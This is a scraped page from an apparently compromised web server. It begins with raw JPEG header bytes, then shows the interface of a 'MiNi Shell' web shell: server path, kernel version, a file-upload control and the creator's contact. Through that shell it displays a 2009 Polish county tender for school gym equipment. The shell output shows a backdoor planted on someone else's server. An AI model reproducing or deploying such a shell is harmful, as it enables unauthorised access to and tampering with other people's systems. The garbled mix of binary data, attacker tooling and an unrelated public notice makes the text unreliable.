JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090709/108643-N-2009.html

<p class="kh_header"><b>Chełm: Dostawa wyposażenia sali gimnastycznej i zaplecza wraz z montażem w ramach zadania: Modernizacja sali gimnastycznej wraz z zapleczem i wyposażeniem przy Zespole Szkół w Siedliszczu</b><br>
<b>Numer ogłoszenia: 108643 - 2009; data zamieszczenia: 09.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Chełmski , Plac Niepodległości 1, 22-100 Chełm, woj. lubelskie, tel. 082 5627501, faks 082 5627510.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.chelm.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> NIE DOTYCZY</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia sali gimnastycznej i zaplecza wraz z montażem w ramach zadania: Modernizacja sali gimnastycznej wraz z zapleczem i wyposażeniem przy Zespole Szkół w Siedliszczu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Dostawa wyposażenia sali gimnastycznej i zaplecza wraz z montażem w ramach zadania: Modernizacja sali gimnastycznej wraz z zapleczem i wyposażeniem przy Zespole Szkół w Siedliszczu.
Kod CPV 37400000-2 - artykuły i sprzęt sportowy

 Zakres rzeczowy przewiduje do realizacji: (realizacja w 2009 roku)
a) dostawę następującego wyposażenia sprzętu sportowego do sali gimnastycznej:
1.Drabina gimnastyczna wraz z uchwytami montażowymi ( mocowane do ściany) wys. od 2,50 m do 2,60 m pojedyncza (szer. 0,9 m) boki z drewna litego - świerk - wraz z montażem - 20 szt.,
2.Ławka gimnastyczna dł. 2 m, podstawa drewniana, drewno klejone bezsęczne - 6 szt.,
3.Drążek gimnastyczny przyścienny. Składający się z listwy naściennej, słupka wolnostojącego z tuleją i drążka. Regulacja wysokości drążka w zakresie od 80 cm do 250 cm ze skokiem, co 10 cm - 1kpl wraz z montażem.
4.Skrzynia gimnastyczna 5-częściowa, pokrycie ze skóry naturalnej z wózkiem - 1 szt.,
5.Kozioł gimnastyczny korpus kozła wykonany z blachy stalowej pokrytej elastyczną otuliną i obciągnięty naturalną skórą. Podstawy wykonane z kształtowników stalowych, posiadające regulację wysokości od 900 mm do 1400 mm ze skokiem co 50 mm. Nogi podstawy niebrudzące, z antypoślizgowymi stopkami gumowymi. Dwie nogi wyposażone w kółka ułatwiające transport. W dolnej części korpusu hak zaczepu za pomocą, którego można dodatkowo przymocować kozła do zamontowanego w nawierzchni sportowej zaczepu podłogowego - 1szt.
6.Materac gimnastyczno-asekuracyjny wym. 1,20 m x 2,0 m, gr. 0,1 m lub zbliżony ze spodem antypoślizgowym - 5 szt.,
7.Odskocznia gimnastyczna treningowa wykonana ze specjalnie profilowanej sklejki liściastej pokryta wykładziną, wysokość czoła odskoczni od 10 cm do 15 cm - 1 szt., 
8.Płotek treningowy stalowo- aluminiowy składany 6-pozycyjny wys. do 1070 mm - 16 szt., 
9.Blok startowy treningowy z 5-stopniowym zakresem pochylenia oparcia, wykonany z aluminium - 4 szt.
10.Tablica do koszykówki laminat wym. 1,05 m x 1,8 m, z ramą metalową - wraz z montażem - 4 szt., 
11.Wysięgnik stalowy naścienny do tablic koszykówki-konstrukcja stała L = do 1,0 m - wraz z montażem - 4 szt., 
12.Słupki do siatkówki przyścienne, stalowe, profil: fi do 80 mm, lakierowane proszkowo, uniwersalne wraz z osłoną wykonaną z pianki poliuretanowej o podwyższonej twardości T30ST pokrytej syntetycznym materiałem skóropodobnym z okuciami montażowymi - wraz z montażem - 1 kpl.,
13.Siatka do siatkówki turniejowa biała, polipropylenowe wym. 9,5 m x 1,0 m - 1 szt., 
14.Obręcz do koszykówki stała wzmocniona bez siatki lakierowana proszkowo - wraz z montażem - 4 szt., 
15.Siatka do koszykówki na obręcz turniejowa - wraz z montażem - 4 szt., 
16.Bramka do piłki ręcznej stal-drewniana wym. 3,0 m x 2,0 m, głębokość od 40 cm do 80 cm przyścienna z okuciami do mocowania w ścianę - z montażem - 2 szt., 
17.Siatki do bramek piłki ręcznej polipropylenowe plecione wym. 3,0 m x 2,0 m, gł. od 40 cm do 80 cm - 2 szt.,
18.Stojak do skoku wzwyż aluminiowo-stalowy składający się z dwóch słupków aluminiowych oraz dwóch stalowych podstaw lakierowanych proszkowo. Słupki ze stopów aluminiowych z blokadą umożliwiającą płynną regulację wysokości zawieszenia poprzeczki w zakresie od 40cm do 210 cm. - 1 kpl., 
19.Poprzeczka do skoku wzwyż-włókno szklane - 1 szt., 
20.Materac do zeskoku o wym.2,0 m x 3,0 m x 0,4 m (zeskok komorowy) treningowy, wypełnienie materaca wykonane metodą komorową, pokrycie zeskoku wykonane z bardzo wytrzymałego materiału PCV, na wszystkich bokach zeskoku specjalne odpowietrzniki, spód wykonany z materiału antypoślizgowego, dodatkowe uchwyty ułatwiające transport - 1 szt., 
21.Pełnowymiarowa sztanga olimpijska - zestaw 140 kg, dł. 220 cm, średnica FI 50, talerze gumowe: 
-   4 x 1,25 kg
-   4 x 2,5 kg
-   2 x 5 kg
-   2 x 10 kg
-   2 x 15 kg
-   2 x 20 kg,
-   zaciski 2 x 2,5kg
-   gryf 20 kg dł. 220 cm - 1 kpl., 

22.Ławka z podporą pod sztangę z regulacją wysokości do 170 cm - 1 kpl
23.Zestaw hantli chromowanych 2x 7,5kg z 4 śrubowymi zaciskami, 2 x gryf z ryflowaną rękojeścią (do 35 cm) odważniki: 4 x 1,25 kg i 4 x 1,5 kg - 1 kpl.,
24.Lustro gładkie przyścienne, bez poręczy o wym. 2,0 m x 1,0 m x 2 szt.  z uchwytami w przypadku takiego montażu lub inny rodzaj zamontowania wraz z montażem - 4 m2,
25.Siatka ochronna piłkochwyt z uchwytami względnie z okuciami (na ściany szczytowe za bramkami p. ręcznej), grubość splotu fi 3,0, oko 45 mm x 45 mm, zielona 6,5 m x 10 m x 2szt - z montażem - 130m2
26.Tablica świetlna wyników z zasilaniem 220 V, sterowanie bezprzewodowe, wysokość cyfr 100 mm - widoczność 30 m, certyfikat na podzespoły, stały napis goście - gospodarze, tablica główna, wskazywane parametry: czas gry, wynik meczu, od 0 do 99 punktów, nr połowy meczu, stan setów lub suma fauli, sygnał dźwiękowy, minimalne wymiary: 100 x 80 cm- wraz z montażem - 1 szt., 

b) wyposażenie zaplecza socjalnego dla dziewcząt i chłopców, które obejmie:
27.Ławka szatniowo-korytarzowa drewniano-metalowa bez oparcia o długości do 2 m - 8 mb, 
28.Wieszak szatniowy przyścienny drewniany o długości do 2 m- wraz z montażem - 8 mb,
29.Rower treningowy o niżej podanych parametrach: - 1szt
- Max. Waga Użytkownika: 110kg
- Kółka transportowe
- Dotykowy wyświetlacz
- Program komputerowy do monitorowania treningów 
- 6 Programów z 16 poziomami trudności
- Program SWR
- Program HRC
- Wyświetlane funkcje: prędkość, RPM, czas, kalorie, dystans
- Telemetryczny system pomiaru pulsu
- Czujniki pomiaru pulsu w uchwytach
- Pozioma i pionowa regulacja siodełka
- Uchwyt na bidon
Wymiary:
-     +/- 115 cm x +/- 60 cm x +/- 150 cm
-     Waga: do 40 kg
-     Koło zamachowe: do 9 kg.
30.Urządzenie treningowe wioślarz - 1 szt, wraz z montażem o następujących parametrach: 
Wyposażenie:
-  Opór - system magnetyczny 
-  Napęd - cięgna linowe 
-  Ustawienie obciążenia - 10 stopni poprzez pokrętła 
-  Siodełko - ułożyskowane na rolkach 
-  Bezprzewodowy pas do pomiaru tętna - w zestawie 
-  Dodatkowe ćwiczenia siłowe/sprawnościowe - z 18 wariantami ćwiczeń: Wiosłowanie, trening bicepsów, trening tricepsów, wiosłowanie na stojąco. 
-  Rolki transportowe - tak
-  Wymiary (dł/szer/wys) -   +/- 180 cm x +/- 55 cm x +/-59 cm.
-  Ciężar koła zamachowego - do 7 kg 
-  Maksymalne obciążenie - do 130 kg 
Komputer treningowy: 
-  Pomiar czasu 
-  Odległość całkowita w km/ruchy wioseł 
-  Tempo wiosłowania z sygnałem akustycznym (możliwość wyłączenia)
-  Zużycie energii 
-  Pomiar tętna 
-  Wartości średnie 
-  Górna granica tętna - wskaźnik procentowy, sygnał ostrzegawczy optyczny i akustyczny 
-  Trening ukierunkowany na strefy  
-  Pomiar tętna w fazie spoczynku z oceną sprawności
31.Atlas do ćwiczeń 4 stanowiskowy z możliwością wykonywania 38 różnych ćwiczeń - 1 szt, wraz z montażem o następujących parametrach technicznych:
- Wyciskanie na klatkę piersiową, z regulacją konta 0-90 stopni 
-  przysiad z obciążeniem do 100 kg ,
- motyl, 
- wyciąg górny, 
- wyciąg dolny, 
- przyrząd do ćwiczenia nóg, 
- modlitewnik do 60 kg 
- niezależna ławka kątowa dostawiana do atlasu 
- Przyrząd do wyciskania ramion i ćwiczeń mięśni brzucha 
- ławkę skośna do ćwiczeń mięśni brzucha 
- Wysokość do 2,20 m 
- Szerokość do 2,60 m 
- Długość do 3,60 m 
- Wykonawca dostarczy i zamontuje w widocznym miejscu instrukcję obsługi i regulamin korzystania z urządzeń w języku polskim.
Wykonawca udzieli gwarancji:
- montaż sprzętu (minimum 36 miesięcy)
- sprzęt i urządzenia zgodnie z gwarancją producenta ( minimum 12 miesięcy )
-  Licząc od dnia odbioru przedmiotu zamówienia. 
W związku z koniecznością montażu niektórych elementów np drążka gimnastycznego informujemy, że podłoga w sali wykonana jest z klepki dębowej gr 2cm, na podłożu z betonu B-20 o gr 8cm.

Wykonawca zapewni bezpłatny serwis urządzeń przez okres gwarancji.
Przed upływem okresu gwarancji wykonawca dokona nieodpłatnie przeglądu dostarczonego i zamontowanego przedmiotu umowy i uzyska potwierdzenie Zamawiającego o braku zastrzeżeń, co do jego jakości. 

Uwaga: Celem uniknięcia nieporozumień proponuje się dokonanie wizji lokalnej sali 
gimnastycznej przed dokonaniem sporządzenia oferty..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 37.40.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wykonawca  przystępujący do przetargu  jest zobowiązany wnieść wadium w wysokości 2 000,00 zł / dwa tysiące złotych /.
2. Wykonawca wnosi wadium  w formie określonej w art. 45 ustawy.
3. Wadium wniesione w pieniądzu należy  wpłacić na rachunek bankowy Starostwa Powiatowego w  Chełmie PKO B.P. SA  o/ Chełm 25 1020 1563 0000 5902 0013 7349 z dopiskiem wadium przetarg - Siedliszcze- dostawa sprzętu . Wadium uważa się za wniesione, jeżeli kwota wadium znajdzie  się na rachunku zamawiającego  przed upływem terminu składania ofert.
4. Dowód  wniesienia wadium należy dołączyć do  oferty.
5. Nie wniesienie wadium lub wniesienie wadium po terminie spowoduje wykluczenie wykonawcy z postępowania.
6. Zamawiający dokona zwrotu wadium zgodnie z treścią  art.46 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1, oraz nie podlegają wykluczeniu na podstawie art. 24 ust.1, 2, ustawy Prawo zamówień publicznych.
1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy  nakładają obowiązek posiadania takich uprawnień
2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i  osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj.: 
a) w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonali co najmniej dwa zamówienia odpowiadające swoim rodzajem dostawom stanowiącym przedmiot zamówienia o wartości nie mniejszej niż 50.000,00 zł netto każde z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, z załączeniem dokumentów potwierdzających, że te dostawy zostały wykonane należycie,  
3.  Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4. Nie podlegają wykluczeniu z postępowania o zamówienie publiczne. 
5.Dopuszcza się możliwość złożenia oferty wspólnej przez dwóch lub więcej wykonawców w   rozumieniu art. 23 ustawy. W przypadku złożenia oferty wspólnej każdy z wykonawców musi oddzielnie udokumentować spełnienie wymagań określonych w art. 22 ust. 1 pkt 1 i 4 ustawy. Wymagania określone w art. 22 ust. 1 pkt 2 i 3 ustawy Wykonawcy mogą spełniać wspólnie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

   

     


Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wymienionych w  punkcie VI SIWZ, zgodnie z formułą   spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, spełnienia warunków określonych w rozdz. V wykonawca zobowiązany jest złożyć wraz z ofertą niżej wymienione oświadczenia i dokumenty:
1.Oświadczenie, że:
a) posiada uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b) posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia. 
c) znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d) nie podlega wykluczeniu z postępowania o zamówienie publiczne. 
Oświadczenie to należy złożyć według wzoru stanowiącego załącznik nr 3 do SIWZ.

2.  W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy  z dnia  29 stycznia 2004 r. Prawo  Zamówień Publicznych, Wykonawca powinien złożyć  następujące dokumenty:
    a)   aktualny odpis z właściwego rejestru albo aktualne  zaświadczenie o wpisie do  ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej,  wystawionego nie wcześniej niż sześć miesięcy  przed  upływem terminu składania ofert.

3. W celu potwierdzenia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia  oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,  wykonawca winien złożyć następujące dokumenty:
a) wykaz wykonanych dostaw w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, obejmujących co najmniej dwa zamówienia odpowiadające swoim rodzajem dostawom stanowiącym przedmiot zamówienia o wartości nie mniejszej niż 50.000,00 zł netto każde, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców  z załączeniem dokumentów potwierdzających, że te dostawy zostały wykonane należycie, według wzoru stanowiącego  załącznik nr 4 do SIWZ, 


   Dokumenty  należy złożyć  w  formie oryginału lub  kopii  poświadczonej za zgodność z oryginałem  (na każdej zapisanej stronie) przez Wykonawcę lub upoważnionego przedstawiciela Wykonawcy, zgodnie z treścią dokumentu określającego status prawny Wykonawcy lub treścią załączonego do oferty pełnomocnictwa..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat.chelm.pl/przetragi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo  Powiatowe w Chełmie, Plac Niepodległości 1, 22-100 Chełm, p.108, I piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2009 godzina 12:00, miejsce: Sekretariat Starostwa  Powiatowego w Chełmie, Plac Niepodległości 1, 22-100 Chełm, p.114, I piętro lub za pośrednictwem pocztowego operatora publicznego.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com